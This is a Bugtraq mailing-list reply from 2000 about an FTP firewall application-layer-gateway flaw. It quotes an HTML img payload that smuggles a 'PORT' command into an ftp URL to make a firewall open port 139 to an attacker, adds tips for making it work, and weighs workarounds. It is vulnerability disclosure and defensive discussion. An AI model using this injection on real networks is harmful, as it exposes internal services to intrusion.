[14269] in bugtraq
Re: Extending the FTP "ALG" vulnerability to any FTP client
daemon@ATHENA.MIT.EDU (Solar Designer)
Tue Mar 14 18:14:27 2000
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-ID: <200003120241.FAA16624@false.com>
Date: Sun, 12 Mar 2000 05:41:55 +0300
Reply-To: Solar Designer <solar@FALSE.COM>
From: Solar Designer <solar@FALSE.COM>
X-To: mikael.olsson@ENTERNET.SE
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38C8C648.B7CCE2C8@enternet.se> from Mikael Olsson at "Mar 10,
0 10:54:16 am"
Hello,
> * Send a HTML email to an HTML-enabled mail reader
> containing the tag
> <img src="ftp://ftp.rooted.com/aaaa[lots of A]aaaPORT 1,2,3,4,0,139">
I was playing with that recently as well. Yes, this works. Some
browsers add an extra "/" to such requests (at least on the first
check, for a directory), so one might want to add %0d%0a to the end.
It's also important that this is either an ftp URL, or some other
text-based protocol directed to 21/tcp (such as, http://server:21).
> * Balance the number of A so that the PORT command will begin
> on a new packet boundary. This may also be done by having
> the server use a low TCP MSS to decrease the number of A's that
> one has to add.
This is not always necessary. Linux's ip_masq_ftp module is happy to
detect PORT anywhere in packets travelling to 21/tcp.
> * The firewall in question will incorrectly parse the resulting
> RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139
> as first a RETR command and then a PORT command and open
> port 139 against your address (1.2.3.4 in this case)
It will also translate the PORT command, so that ftp.rooted.com sees
the firewall's IP address and port number that's currently redirected
to client:139.
> * Disable active FTP. Errrr, wait. The fix for the server side
> vulnerability was to disable passive FTP. Let's rephrase that:
>
> * Disable FTP altogether. Block port 21. Disable FTP Application
> Layer Filters on all ports in your firewall.
There's a partial workaround: only allow access to non-privileged
ports. Yes, there can still be vulnerable services on those. :-(
I haven't tested if this would work with real-world FTP clients on
Win32 -- are there any that would use privileged ports?
> * If you can't change the settings in your firewall, set the
> "FTP Proxy" setting in your browser/HTML-enabled mail reader
> to some address that doesn't exist, like 127.0.0.2. After
> this change, your browser won't be able to connect anywhere
> using FTP.
That doesn't help against the http://...:21 trick.
Signed,
Solar Designer
